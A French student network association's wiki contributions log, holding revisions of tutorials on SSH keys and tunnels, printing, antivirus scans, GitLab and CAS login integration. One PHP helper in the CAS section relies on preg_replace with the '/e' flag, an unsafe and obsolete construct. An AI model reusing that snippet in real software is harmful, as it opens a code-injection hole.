WikiBR - Contributions [fr]

SSH

2023-12-01T21:00:31Z

Jean-samuel.tettekpoe : Ajout commentaire

{{Menu tutoriels}}

'''SSH''' (Secure Shell) est un protocole permettant d'obtenir un '''accès Shell''' (ie: ouvrir un terminal de commandes) sur une machine distante en toute sécurité. Il permet d'exécuter des commandes à distance, de copier des fichiers depuis/vers une machine distante, etc.

Nous allons voir ici quelques options intéressantes.
== Accès aux sites internet du plâtal depuis l'extérieur ==

Tu peux accéder aux sites visibles normalement uniquement à l'intérieur du plâtal (Chocapix...) depuis n'importe où grâce à un tunnel SSH. La seule exception est fruit.

=== Installation ===

Installer l’extension “Foxy Proxy Standard” sur votre navigateur. Sur Firefox, vous pouvez trouver cette extension sur [https://addons.mozilla.org/fr/firefox/addon/foxyproxy-standard/ ce lien].
Appuyer sur l’icône Foxy Proxy puis sur options > ajouter.
Sélectionner le type de Proxy SOCKS5, rentrer l’adresse IP 127.0.0.1 et le port 9090. Vérifier que “Send DNS through SOCKS5 proxy” est bien coché. Donner un titre quelconque au proxy. Appuyer sur sauvegarder. Vous pouvez ajouter des modèles, pour que le proxy ne soit activé que sur certains noms de domaines.

=== Lancement ===

Ouvrir un terminal. Sur Windows, taper cmd dans la barre de recherche windows et appuyer sur entrer
Sur la fenêtre terminal ouverte, taper la commande suivante puis rentrer votre mot de passe (identifiants polytechnique.edu).
ssh -D 9090 prenom.nom@ferrari.polytechnique.fr

où "ferrari" peut être remplacé par le nom de n'importe quel [https://wikix.polytechnique.org/Ordinateurs_des_salles_info ordinateur des salles info].
Appuyer sur l’icône Foxy Proxy et cliquer sur le proxy nouvellement crée.
C’est bon vous êtes connecté, vous pouvez vérifier que cela a bien fonctionné en allant sur trigramme.binets.fr par exemple

=== Précisions ===

Il faut bien laisser la fenêtre de terminal ouverte lorsque l’on utilise le proxy, pour garder la connexion SSH.
Pour arrêter le proxy, il faut bien penser à remettre l’option désactiver sur l’extension Foxy Proxy.
Pour se reconnecter, il suffit de refaire la manipulation décrite dans lancement.

=== Fonctionnement ===

Ce proxy permet en fait simplement de faire transiter la connexion internet à travers l’un des ordinateurs de la salle info. Dans ce tutoriel, l’ordinateur ferrari a été utilisé mais on peut prendre n’importe lequel.

Pour les non décrocheurs, qui n'ont plus de compte DSI, suivre la page [[Configuration du proxy]].

== Clé publique et clé privée==
Il est possible de se connecter via SSH à une machine sans avoir à taper son mot de passe !

C'est parfois la seule manière de s'y connecter, comme dans le cas des ordinateurs des salles informatiques, qui sont accessibles par ce moyen depuis l'extérieur (hors platal).

=== Mise en place du dossier ssh ===
La configuration ssh ainsi que les différentes clés sont à mettre dans le dossier <code>.ssh</code>. Si c'est la première fois que vous configurez ssh sur votre machine, il faudra le créer dans votre dossier utilisateur :

==== Sur Windows ====
C:/Users/<nom_utilisateur>/.ssh

==== Sur Linux ====
~/.ssh
ou
/home/<nom_utilisateur>/.ssh

C'est '''dans ce dossier''' qu'il faudra utiliser la commande de génération de clés ssh suivante !

=== Création de la clé ===

En local, sur une machine où l'on est le seul administrateur (machine perso), taper la commande suivante dans un terminal. Attention à bien se placer dans le dossier ''.ssh'' avant :
ssh-keygen

Cette commande va ensuite demander d'entrer plusieurs champs :
* le nom du fichier dans lequel sauvegarder la clé (= le nom de la clé). Si vous n'entrez rien, la clé générée s'appellera <code>id_rsa</code>, qui sert de clé ssh générale.
* Un mot de passe (qu'il vous faudra taper chaque fois que vous utilisez cette clé). Bien que conseillée, cette étape n'est pas nécessaire. Laissez les champs vides pour ne pas associer de mot de passe à la clé générée.

Ceci va générer dans le dossier courant (faites attention à exécuter cette commande dans le dossier .ssh !) un couple clé privée / clé publique, chiffrée en RSA, sous la forme de fichiers <code>id_rsa</code> et <code>id_rsa.pub</code> (ou bien avec le nom que vous avez entré à la place de ''id_rsa''). '''Il est important de ne jamais partager la clé privée !''' C'est la clé publique qui devra être transmise aux machines / sites (github, gitlab) auxquels vous souhaitez vous connecter.

Au BR, on te conseille d'utiliser une clef RSA 4096 bits, à laquelle tu peux ajouter un commentaire avec la commande suivante :
ssh-keygen -t rsa -b 4096 -C "<comment>"

=== Ajouter une clé ssh à gitlab ===
L'un des principaux intérêts des clés ssh est de pouvoir ''cloner'' et ''push'' du code vers un dépôt git distant sans avoir à taper son mot de passe à chaque fois.

==== Copier la clé publique vers gitlab ====

Copiez l'intégralité du contenu de votre clé publique. Vous pouvez afficher son contenu avec les commandes <code>type id_rsa.pub</code> sur Windows et <code>cat id_rsa.pub</code> sur Linux. Il faut ensuite coller la clé publique sur gitlab, dans l'onglet <code>Profil > Préférences > Clés SSH</code>.

Par défaut, une date d'expiration d'un an est associée à votre clé sur gitlab.

==== Ajouter une configuration locale à git@gitlab.binets.fr ====

Pour s'assurer que les commandes git utilisent bien la bonne clé ssh, il est souvent nécessaire d'ajouter un '''fichier de configuration ssh''' dans le dossier <code>.ssh</code>.

Créez un fichier <code>config</code> (sans extension !) dans votre dossier ''.ssh''. Voici un template de configuration ssh pour explicitement associer une clé à un hôte :

===== Sous Linux =====

Host gitlab # Nom de l'hôte
HostName gitlab.binets.fr # Adresse complète de l'hôte : site ou adresse ip
User git # Utilisateur de la clé ssh
IdentityFile ~/.ssh/id_rsa # Adresse de la clé privée à utiliser

===== Sous Windows =====

Host gitlab.binets.fr # Nom de l'hôte
HostName gitlab.binets.fr # Adresse complète de l'hôte : site ou adresse ip
User git # Utilisateur de la clé ssh
IdentityFile C:\Users\<nom_utilisateur>\.ssh\id_rsa # Clé privée à utiliser, ~/.ssh/id_rsa fonctionne aussi

Vous pouvez ensuite tester votre clé ssh avec la commande suivante :
ssh -T git@gitlab.binets.fr

Vous pouvez reconnaître dans la commande qui permet de cloner un dépôt avec git en ssh :
git@gitlab.binets.fr:br/sigma-frontend.git

<user>@<hôte>:<repo_owner>/<repo_name>.git

=== Export vers les autres machines ===

''Note: cette étape n'est pas nécessaire pour se connecter en ssh aux ordinateurs de salle info.''
La [https://portail.polytechnique.edu/dsi/salles-informatiques/liste-des-ordinateurs liste des ordinateurs de salle informatique] est disponible sur le site de l'école.

Il suffit ensuite de taper la commande suivante, puis de taper votre mot de passe DSI(Synapses, Moodle) :
ssh prenom.nom@allemagne.polytechnique.fr

Dans le cas général, si vous souhaitez vous connecter en ssh vers une autre machine, il faut envoyer le fichier contenant la clé publique (~/.ssh/id_rsa.pub) sur les machines auxquelles on veut se connecter :

==== Avec ssh-copy-id ====

Cette commande ne fonctionne pas sur windows. Elle demandera le mot de passe utilisateur, pour la dernière fois.

ssh-copy-id login_distant@machine_distante

==== Manuellement ====
Sur les mac, par exemple, ssh-copy-id n'est pas disponible. Il faut donc rajouter manuellement la clé publique à liste des clés autorisées sur la machine distante en copiant le contenu de ~/.ssh/id_rsa.pub (en local) dans .ssh/authorized_keys (sur la machine distante) :
* sur la machine locale :
scp ~/.ssh/id_rsa.pub login_distant@machine_distante:~
* sur la machine distante :
cat ~/id_rsa.pub >> ~/.ssh/authorized_keys

=== ssh-agent ===
Il s'agit d'un programme qui vient faciliter l'utilisation des clés privées : en le lançant au début de ta session graphique, il suffit de taper dans un shell
ssh-add
pour qu'il demande la passphrase de la clé privée, puis la charger en mémoire : plus besoin de taper cette passphrase lors d'un SSH !
Tu peux indiquer par l'option ''-A'' dans ton ssh que tu souhaites ''forwarder'' l'agent : si tu as exporté ta clé publique sur les machines hostA et hostB, alors en faisant
ssh -A hostA
puis, sur hostA
ssh hostB

le second ssh utilisera le ssh-agent qui tourne localement sur ton ordinateur pour récupérer la clé privée et s'authentifier auprès de hostB. Il devient alors intéressant d'utiliser l'option ForwardAgent (cf plus bas) pour pouvoir se balader librement entre les différentes machines.

=== Connection ===
Pour se connecter, on tape
ssh login_distant@machine_distante

Si on a lancé le ssh-agent avant (ssh-add), le client ssh va demander la passphrase de la clé, puis établir la connexion.

=== Fonctionnement===
Lors d'un SSH par clé privée / clé publique
# le serveur ssh va indiquer au client "j'accepte les clés publiques suivantes" en lisant le fichier authorized_keys
# mon client va voir qu'il a la clé privée correspondant
# mon client me demander ma passphrase
# si la passphrase est bonn, mon client va établir le ssh sans me demander mon mot de passe user

== Mémorisation de configuration SSH ==

Il est possible de configurer SSH pour ne pas avoir à préciser le login ou le nom complet de la machine.

Il faut éditer le fichier ''.ssh/config'' :

Host alias
Hostname nom.complet.de.la.machine
User login_distant

=== Proxy ===
On peut également y rajouter les options relatives au Proxy :
ProxyCommand socat - PROXY:kuzh.polytechnique.fr:%h:%p,proxyport=8080
ou
ProxyCommand connect -H kuzh.polytechnique.fr:8080 %h %p
ou celles relatives au transfert d'agent ssh :
ForwardAgent yes

Ainsi,
ssh alias
sera traduit automatiquement en
ssh -A -o ProxyCommand="socat - PROXY:kuzh.polytechnique.fr:%h:%p,proxyport=8080" login_distant@nom.complet.de.la.machine
ou
ssh -A -o ProxyCommand="connect -H kuzh.polytechnique.fr:8080 %h %p" login_distant@nom.complet.de.la.machine

=== Passer par un hôte intermédiaire ===

On a parfois besoin de se logger en SSH de A sur B pour ensuite se logger de B sur C. Pour automatiser ça, il suffit de mettre ces lignes dans {{c|~/.ssh/config}}
Host C
ProxyCommand ssh login@B -W %h:%p

== La commande <code>scp</code> ==

[https://fr.wikipedia.org/wiki/Secure_copy SCP], pour Secure Copy Protocol, est un protocole se basant sur le protocole SSH. Il sert à copier des fichiers entre machines distantes.

Toujours dans la console, la commande suivante te permettra de copier un fichier depuis un hôte ssh distant :

<pre>scp utilisateur@addressedelamachine:fichier/a/copier fichier/de/destination</pre>
<code>fichier/a/copier</code> designe le path du fichier dans le système de fichiers distant, et <code>fichier/de/destination</code> est le path du dossier, sur ''votre'' machine, ou tu veux le copier.

À l'inverse, la commande suivante permet de copier un fichier vers un hôte ssh distant :

<pre>scp fichier/a/copier utilisateur@addressedelamachine:fichier/de/destination</pre>
Pour copier des dossiers, c’est la même option que pour <code>cp</code> :

<pre>scp -r utilisateur@addressedelamachine:dossier/a/copier dossier/de/destination</pre>

== Voir aussi ==

[[Acc%C3%A8s_%C3%A0_distance_aux_machines_des_salles_info|Accès à distance aux machines des salles info]]

[[Astuces_ssh|Astuces SSH]]

[[Catégorie:Tutoriels]]

Impression

2023-08-06T15:23:26Z

Jean-samuel.tettekpoe : Ajout impression en différé

{{Menu tutoriels}}
[[Catégorie:Tutoriels]]

Cette page développe les différentes façon d'imprimer des documents à l'École polytechnique.

== Avec la DSI ==

L'École met à disposition des élèves un service d'impression noir et blanc, qui '''peut être utilisé à distance''' (très pratique en veille de pâle d'HSS). Son site associé est https://impression.polytechnique.fr/. Il est possible d'y consulter ses crédits (100 par mois), et de les transférer à d'autres élèves.

=== Sur place ===

Pour imprimer sur place, le plus pratique est d'aller à la bibliothèque, tout au fond sur la droite en rentrant. Là, deux imprimantes et deux ordinateurs sont mis à disposition.

=== À distance ===

Pour imprimer à distance, il suffit d'aller sur le [https://impression.polytechnique.fr site du service d'impression] et de sélectionner l'onglet <code>Web Print</code> puis appuyer sur le bouton <code>Submit a job</code>. Il faut alors choisir l'imprimante, pour imprimer à la bibliothèque, il faut choisir <code>xprint1\6518a-bibls1</code> ou <code>xprint1\6518a-bibls2</code>. '''L'impression sera réalisée en même temps.''' Choisir alors le nombre de copies puis téléverser son fichier, '''en format pdf seulement'''. Pour faire une impression en différée, tu peux choisir l'imprimante <code>xprint1\POLYTECHNIQUE (virtuelle)</code> pour placer ton document en file d'attente. Il te suffira de badger sur une imprimante pour pouvoir libérer l'impression sur cette machine.

== Avec la Kès ==

La Kès permet aussi d'imprimer ses fichiers, avec la possibilité d'une impression couleurs. Cependant ce service est payant. Pour l'utiliser, il suffit de se rendre au local Kès pendant une permanence.

Modèle:Content support mail

2023-08-06T15:15:32Z

Jean-samuel.tettekpoe : Update email addresses

* problème technique personnel :
https://panix.binets.fr
(support@binets.fr si vous ne pouvez pas accéder à PaniX)
* demande sur Chocapix (bug, question) :
babe@binets.fr
* problème avec un autre service du BR
root@eleves.polytechnique.fr
* autre (informations, recrutement) :
br@binets.fr

Accueil

2023-05-10T12:51:26Z

Jean-samuel.tettekpoe : Màj URL école

__NOTOC____NOEDITSECTION__
=== Bienvenue sur le site du BR ! ===

Le Binet Réseau est l'association d'étudiants de l'[https://polytechnique.edu École polytechnique] qui s'occupent du réseau élève : maintenance des serveurs, mise en place de nouveaux services et développement (applications réseau et sites).

L'InfoBR est disponible en ligne sur [https://infobr.binets.fr ce site].

==Les ressources en ligne==
{|
| valign="top" |{{block services}}
| valign="top" |{{block tutoriels}}
|}

==Le BR recrute==
Les membres du Binet Réseau ne sont pas pour autant tous des férus d'informatique et se partagent les taches en fonction de leurs capacités et de leurs envies : relations avec nos partenaires, communication avec les élèves constituent aussi des postes essentiels.

Ainsi, le Binet Réseau offre une chance unique d'approfondir ses connaissances en informatique, au service des autres et en se faisant plaisir.

{|
| valign="top" |
=== Deviens un membre actif du BR ! ===
À n'importe quelle époque de l'année, viens nous voir et nous t'accueillerons à bras ouverts. Il y a toujours des choses à faire pour améliorer les services ou faire de nouveaux services.
| valign="top" |{{block postes}}
|}

==N'hésite pas à nous contacter==
{| class="tableau-support"
| valign="top" |{{block|Par mail|support mail|Edit.png}}
| valign="top" |{{block|Au téléphone|support téléphone|Phone.png}}
{{block|En vrai|support vrai|People.png}}
|}

Antivirus

2022-11-07T09:47:42Z

Jean-samuel.tettekpoe :

En cas de détection d'une infection par la DSI, ton compte est bloqué le temps que tu nettoies ton appareil. Il faut pour cela effectuer un scan antivirus avant de demander le déblocage de ton compte (en cas de récidive, la DSI peut bloquer ton compte plus longtemps). Change aussi tes mots de passe DSI sur [https://annuaire.polytechnique.fr XAJAM] et BR sur [https://sigma.binets.fr Sigma].

== Antivirus gratuits ==

Les deux logiciels gratuits pour scanner son ordinateur recommandés par le BR sont [https://fr.malwarebytes.com/adwcleaner/ AdwCleaner] et [https://fr.malwarebytes.com/ Malwarebytes] (utilisation gratuite pendant 2 semaines). Pour une utilisation quotidienne, le BR ne conseille pas d'antivirus particulier.

== BitDefender ==

Depuis fin 2022, la DSI nous fournit quelques licences pour scanner son ordinateur avec BitDefender, vous avez en-dessous les liens d'installation, il faut désinstaller le logiciel après le scan (ce sont des licences tournantes uniquement pour effectuer des scans, à tout moment la DSI peut désactiver à distance la licence sur ton ordinateur).

Programme d’installation pour [https://cloudgz.gravityzone.bitdefender.com/Packages/BSTWIN/0/setupdownloader_%5BaHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvb0dZNW1UL2luc3RhbGxlci54bWw-bGFuZz1mci1GUg==%5D.exe Windows], [https://cloudgz.gravityzone.bitdefender.com/Packages/NIX/0/oGY5mT/setup_downloader.tar Linux] et [https://cloudgz.gravityzone.bitdefender.com/Packages/MAC/0/oGY5mT/setup_downloader.dmg Mac].

== Articles connexes ==

[[Catégorie:Services]]

Antivirus

2022-11-07T09:47:11Z

Jean-samuel.tettekpoe :

En cas de détection d'une infection par la DSI, ton compte est bloqué le temps que tu nettoies ton appareil. Il faut pour cela effectuer un scan antivirus avant de demander le déblocage de ton compte (en cas de récidive, la DSI peut bloquer ton compte plus longtemps). Change aussi tes mots de passe DSI sur [https://annuaire.polytechnique.fr XAJAM] et BR sur [https://sigma.binets.fr Sigma].

== Antivirus gratuits ==

Les deux logiciels gratuits pour scanner son ordinateur recommandés par le BR sont [https://fr.malwarebytes.com/adwcleaner/ AdwCleaner] et [https://fr.malwarebytes.com/ Malwarebytes] (utilisation gratuite pendant 2 semaines). Pour une utilisation quotidienne, le BR ne conseille pas d'antivirus particulier.

== BitDefender ==

Depuis fin 2022, la DSI nous fournit quelques licences pour scanner son ordinateur avec BitDefender, vous avez en-dessous les liens d'installation, il faut désinstaller le logiciel après le scan (ce sont des licences tournantes uniquement pour effectuer des scans, à tout moment la DSI peut désactiver à distance la licence sur votre ordinateur).

Programme d’installation pour [https://cloudgz.gravityzone.bitdefender.com/Packages/BSTWIN/0/setupdownloader_%5BaHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvb0dZNW1UL2luc3RhbGxlci54bWw-bGFuZz1mci1GUg==%5D.exe Windows], [https://cloudgz.gravityzone.bitdefender.com/Packages/NIX/0/oGY5mT/setup_downloader.tar Linux] et [https://cloudgz.gravityzone.bitdefender.com/Packages/MAC/0/oGY5mT/setup_downloader.dmg Mac].

== Articles connexes ==

[[Catégorie:Services]]

Antivirus

2022-11-06T22:45:20Z

Jean-samuel.tettekpoe : Ajout changement de mot de passe

En cas de détection d'une infection par la DSI, ton compte est bloqué le temps que tu nettoies ton appareil. Il faut pour cela effectuer un scan antivirus avant de demander le déblocage de ton compte (en cas de récidive, la DSI peut bloquer ton compte plus longtemps). Change aussi tes mots de passe DSI sur [https://annuaire.polytechnique.fr XAJAM] et BR sur [https://sigma.binets.fr Sigma].

== Antivirus gratuits ==

Les deux logiciels gratuits pour scanner son ordinateur recommandés par le BR sont [https://fr.malwarebytes.com/adwcleaner/ AdwCleaner] et [https://fr.malwarebytes.com/ Malwarebytes] (utilisation gratuite pendant 2 semaines. Pour une utilisation quotidienne, le BR ne conseille pas d'antivirus particulier.

== BitDefender ==

Depuis fin 2022, la DSI nous fournit quelques licences pour scanner son ordinateur avec BitDefender, vous avez en-dessous les liens d'installation, il faut désinstaller le logiciel après le scan (ce sont des licences tournantes uniquement pour effectuer des scans, à tout moment la DSI peut désactiver à distance la licence sur votre ordinateur).

Programme d’installation pour [https://cloudgz.gravityzone.bitdefender.com/Packages/BSTWIN/0/setupdownloader_%5BaHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvb0dZNW1UL2luc3RhbGxlci54bWw-bGFuZz1mci1GUg==%5D.exe Windows], [https://cloudgz.gravityzone.bitdefender.com/Packages/NIX/0/oGY5mT/setup_downloader.tar Linux] et [https://cloudgz.gravityzone.bitdefender.com/Packages/MAC/0/oGY5mT/setup_downloader.dmg Mac].

== Articles connexes ==

[[Catégorie:Services]]

Antivirus

2022-10-28T10:11:48Z

Jean-samuel.tettekpoe : Une page qui ressemble à quelque chose

En cas de détection d'une infection par la DSI, ton compte est bloqué le temps que tu nettoies ton appareil. Il faut pour cela effectuer un scan antivirus.

== Antivirus gratuits ==

Les deux logiciels pour scanner son ordinateur gratuits recommandés par le BR sont [https://fr.malwarebytes.com/adwcleaner/ AdwCleaner] et [https://fr.malwarebytes.com/ Malwarebytes] (utilisation gratuite pendant 2 semaines. Pour une utilisation quotidienne, le BR ne conseille pas d'antivirus particulier.

== BitDefender ==

Depuis fin 2022, la DSI nous fournit quelques licences pour scanner son ordinateur avec BitDefender, vous avez en-dessous les liens d'installation, il faut désinstaller le logiciel après le scan (ce sont des licences tournantes uniquement pour effectuer des scans, à tout moment la DSI peut désactiver à distance la licence sur votre ordinateur).

Programme d’installation pour [https://cloudgz.gravityzone.bitdefender.com/Packages/BSTWIN/0/setupdownloader_%5BaHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvb0dZNW1UL2luc3RhbGxlci54bWw-bGFuZz1mci1GUg==%5D.exe Windows], [https://cloudgz.gravityzone.bitdefender.com/Packages/NIX/0/oGY5mT/setup_downloader.tar Linux] et [https://cloudgz.gravityzone.bitdefender.com/Packages/MAC/0/oGY5mT/setup_downloader.dmg Mac].

== Articles connexes ==

[[Catégorie:Services]]

WikiBR:Portail communautaire

2022-10-27T16:38:05Z

Jean-samuel.tettekpoe : Page redirigée vers BR:Accueil

#REDIRECT [[BR:Accueil]]

WikiBR:Portail communautaire

2022-10-27T16:37:11Z

Jean-samuel.tettekpoe : Page créée avec « #Redirect [BR:Accueil] »

#Redirect [BR:Accueil]

Login

2022-10-25T01:57:35Z

Jean-samuel.tettekpoe : Destination de redirection modifiée de WikiBR:Portail communautaire en BR:Accueil

#REDIRECT [[BR:Accueil]]

Login

2022-10-25T01:55:18Z

Jean-samuel.tettekpoe : Page de redirection pour la connexion car le CAS refuse les symboles spéciaux

#REDIRECT [[WikiBR:Portail_communautaire]]

Fichier:Yubico personalization tool.png

2022-08-26T14:14:50Z

Jean-samuel.tettekpoe : Capture d'écran de l'application Yubico personalization tool

Capture d'écran de l'application Yubico personalization tool

Authentification CAS

2022-08-26T13:30:42Z

Jean-samuel.tettekpoe : Ajout docker-cas

Sigma permet à des sites externes (binets en particulier) d'utiliser sa base de données pour authentifier les utilisateurs à travers le protocole CAS 3.0.

Le serveur CAS est situé à l'adresse [https://cas.binets.fr/ cas.binets.fr] et est lié à la base de données Sigma. Si vous souhaitez que l'ensemble du personnel de l'École (élèves compris) puisse s'authentifier, vous pouvez utiliser le [https://metacas.binets.fr/ metacas.binets.fr] qui est lui lié au LDAP de l'École.

Le webmaster du site en question doit auparavant faire une demande de mise en place de ce système en créant une tâche PaniX. Il doit alors donner :
* l'url complète de la page de login de son site (plus précisément, l'URL de callback)
* les informations auxquelles il souhaite accéder
* son choix entre cas et metacas
* une justification de la demande
Si la demande est acceptée, un membre du BR va alors inscrire son site dans notre base de données de sites externes.

== Liste des informations disponibles ==

Tu peux demander l'accès aux informations

* noms : prénom, nom, surnom, identifiant BR
* adresse mail
* téléphone
* photo : URL vers la photo TOL
* numéro de chambre
* date de naissance
* groupes : promo, section, binets …
* droits : droits dans les groupes associés (membre, speaker, admin, follower)
* nationalité

== Pour les développeurs ==

=== CAS de développement ===

Pour le développement, il est possible d'utiliser un serveur CAS de test qui tourne dans un container Docker avec des données fictives, ce qui permet de tester facilement les différents privilèges et le fonctionnement de la connexion. Le projet est disponible sur [https://gitlab.binets.fr/br/docker-cas GitLab].

=== En PHP ===

Le plus simple en PHP est d'utiliser la librairie [https://github.com/apereo/phpCAS phpCAS].

==== Code de la page d'identification en PHP ====

Ci-dessous un exemple très simple et commenté de script d'authentification, à mettre sur votre site :

<syntaxhighlight lang="php" line>
<?php
include 'CAS_auth.php';
if(!isset($_GET['ticket'])){
CAS_do_auth();
}
$auth = CAS_get_response();

// et voila !
// les données sont stockées dans $auth = array(key, value, ...);
</syntaxhighlight>

(ne pas oublier d'enregistrer ces infos dans la Session après ...)

==== Code des fonctions utilisées dans ''CAS_auth.php'' ====

<syntaxhighlight lang="php">
<?php

function CAS_do_auth(){
/**
* url de la page de login, doit correspondre *exactement* à celle donnée lors de l'inscription
*/
$site = 'http://monsite/login';
/**
* Il est possible de forcer la reconnexion et d'ignorer ainsi une connexion passée.
*/
$reconnexion = false;
header('Location: https://cas.binets.fr/login?service='.rawurlencode($site).'&renew='
.$reconnexion);
}

function CAS_get_response(){
$site = 'http://monsite/login';

/**
* Récupération de l'id de l'utilisateur correspondant à ce ticket, ainsi que les informations demandées
*/
$response = file_get_contents('https://cas.binets.fr/serviceValidate?service='.rawurlencode($site ).'&ticket='
.$_GET['ticket']);

$doc = new DOMDocument();
$doc->loadXML($response);

if ($doc->getElementsByTagName('authenticationFailure')->length == 0) {
$return = array();
/**
* Récupération de l'id de l'utilisateur
*/
$return['id'] = $doc->getElementsByTagName('user')->item(0)->textContent;
/**
* Récupération des données de l'utilisateur
*/
foreach ($doc->getElementsByTagName('attribute') as $attribute) {
if (isset($return[$attribute->getAttribute('name')])) {
if (!is_array($return[$attribute->getAttribute('name')])) {
$return[$attribute->getAttribute('name')] = [$return[$attribute->getAttribute('name')]];
}
$return[$attribute->getAttribute('name')][] = $attribute->getAttribute('value');
} else {
$return[$attribute->getAttribute('name')] = $attribute->getAttribute('value');
}
}
return $return;
} else {
return false;
}
}
</syntaxhighlight>

==== Bugs vécus ====

Si l'authentification ne fonctionne pas sur certains navigateurs, vérifier les variables $_GET car elles sont peut être doublement encodées. Dans ce cas, soit refaire <code>urldecode</code>, soit un <code>$s = str_replace('%22','"',$s);</code> Si il y a un problème avec les encodages en <code>\u{whatever}</code> pour les caractères accentués, voila une fonction qui peut vous servir (reconversion en UTF-8) :
<syntaxhighlight lang="javascript">
function jsonClean($s) {
return preg_replace("/\\\\u([a-f0-9]{4})/e", "iconv('UCS-4LE','UTF-8',pack('V', hexdec('U$1')))",$s);
}
</syntaxhighlight>

=== Avec NodeJS ===

On utilise le paquet [https://www.npmjs.com/package/cas-authentication cas-authentication].

La [https://www.npmjs.com/package/cas-authentication page descriptive] du package décrit bien comment utiliser le middleware.

''Notes''
* Pour récupérer les attributs, préciser <code>session_info</code> dans la configuration de <code>cas-authentification</code>
* Pour un exemple basique, voir [https://gitlab.binets.fr/hadrien.renaud/cas-auth-validator ici]

=== Avec Django ===

* Installer le paquet django_cas_ng : <code>pip install django-cas-ng</code>
* Ajouter ce paquet à la liste des applications :

<syntaxhighlight lang="python">
INSTALLED_APPS = [
...
'django_cas_ng',
...
]
</syntaxhighlight>

* Configurer la connexion au serveur CAS du BR :
<syntaxhighlight lang="py">
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'django_cas_ng.backends.CASBackend',
)
CAS_SERVER_URL = "https://cas.binets.fr/"
</syntaxhighlight>

* Renseigner les pages de connexion (dans my_project/urls.py par exemple):

<syntaxhighlight lang="python">
from django_cas_ng.views import login, logout

urlpatterns = [
...
url(r'^login$', login, name='cas_ng_login'),
url(r'^logout$', logout, name='cas_ng_logout'),
...
]
</syntaxhighlight>

* Ajouter l'URL d'entrée : <code>LOGIN_URL = "login"</code>

Attention à forcer l'authentification pour les pages concernées :

<syntaxhighlight lang="python">
from django.contrib.auth.decorators import login_required

@login_required
def my_awesome_view(request):
...
</syntaxhighlight>

''À noter :''
* le nom de l'utilisateur connecté se trouve dans : request.user.username (accessible dans n'importe quelle vue).
* les attributs du ldap peuvent être disponibles (demander les attributs nécessaires lors de la mise en place du CAS). Ils sont alors disponibles dans <code>request.session['attributes']</code>.
* plus d'options de configuration sont présentées [[https://github.com/mingchen/django-cas-ng/tree/master/django_cas_ng ici]]

=== Avec Flask ===

On utilise le module [[https://github.com/ravomavain/Flask-CAS flask-cas]]. Voir un exemple [[https://gitlab.binets.fr/br/cas-authenticator/-/blob/master/app.py ici]].

=== Avec Drupal ===

L'implémentation de l'authentification avec un CMS comme Drupal n'est pas forcément évidente. Si vous avez une question, vous pouvez contacter Antoine Sauvage

GitLab

2022-08-05T12:02:53Z

Jean-samuel.tettekpoe :

[https://gitlab.binets.fr GitLab] est un service d'hébergement pour les projets administrés en utilisant Git: PSC, MODALs, services développés par le BR, projets de MAP.

== Pourquoi GitLab ? ==

Il existe d'autres plateformes d'hébergement de code contrôlé avec Git, comme [https://github.com/ GitHub], mais on peut aussi installer une copie du système chez soi, ce que font plusieurs écoles (comme nos voisins de l'ENSTA) et entreprises comme SpaceX, IBM, Inria ou Alibaba ; ce que l'on a décidé de faire. Le code posté sur gitlab.binets.fr est donc hébergé chez nous, sur un serveur du BR. Bien sûr, le service et les dépôts hébergés sont accessibles hors Plâtal, donc vous pouvez travailler et envoyer vos modifs où que vous soyez, dès que vous avez internet. Le GitLab propose les mêmes services d'hébergement et gestion de base que GitHub, mais aussi des services supplémentaires qui seraient payants sur cette plateforme :

* nombre illimité de dépôts avec les options de sécurité que vous voulez
* faire des Wikis et des sites Web avec <code>GitLab Pages</code>
* intégration continue (lancer les tests automatiquement dès que vous envoyez vos modifs) avec GitLab CI/CD
* hébergement de gros fichiers
* s'organiser en groupes et sous-groupes pour collaborer sur des projets en commun, comme le groupe BR (https://gitlab.binets.fr/br)
* issue tracking pour garder le fil des différents problèmes à résoudre et des tâches à attribuer sur le projet
* une interface intelligente, généreuse et disruptive. On peut trouver une liste détaillée des fonctionnalités proposées par GitLab [https://about.gitlab.com/features/ ici].

== Guide : rajouter sa clef [[SSH]] sur le GitLab ==

Si vous venez de l'article [[Git]] vous avez vu qu'il est recommandé d'ajouter une clef SSH sur le GitLab pour faire ses accès au images des dépôts hébergés dessus en utilisant le protocole SSH. Cela n'a rien d'obligatoire, c'est juste du confort !

Pour créer une clef, suivez le guide [[SSH]] et pour l'ajouter, allez dans le menu <code>SSH Keys</code> dans la sidebar.

Il suffit alors de suivre les instructions en ajoutant sa clef publique, et votre clef est prête à l'utilisation !

Si tu utilises une clef avec un différent que celui par défaut, il faut l'ajouter dans ton fichier <code>~/.ssh/config</code>
Host gitlab.binets.fr
PreferredAuthentications publickey
IdentityFile ~/.ssh/example_com_rsa

Pour plus d'informations, notamment si tu utilises plusieurs comptes, voir [https://docs.gitlab.com/ee/user/ssh.html ceci].

GitLab

2022-08-05T12:00:16Z

Jean-samuel.tettekpoe : Consignes pour une clef avec un nom différent

SSH

2022-08-05T11:56:20Z

Jean-samuel.tettekpoe : Ajout clef 4096

SSH est un protocole permettant d'obtenir un accès Shell sur une machine distante en toute sécurité.
Il permet, via SCP, de transférer des fichiers entre diverses machines.

Nous allons voir ici quelques options intéressantes.

== Clé publique ==
Il est possible de se connecter en SSH à une machine sans avoir à taper son mot de passe !

C'est parfois la seule manière, par exemple dans le cas des machines visibles à l'extérieur, depuis l'extérieur de l'X.

=== Création de la clé ===
En local, sur une machine où l'on est le seul administrateur (machine perso) :
ssh-keygen
Laisser la valeur par défaut pour le nom du fichier (~/.ssh/id_rsa) et taper une passphrase (longue et complexe). Ceci va générer en local un couple clé privée / clé publique, chiffrée en RSA. Au BR, on te conseille d'utiliser une clef RSA 4096 bits, tu peux aussi y ajouter un commentaire :
ssh-keygen -t rsa -b 4096 -C "<comment>"

=== Export vers les autres machines ===
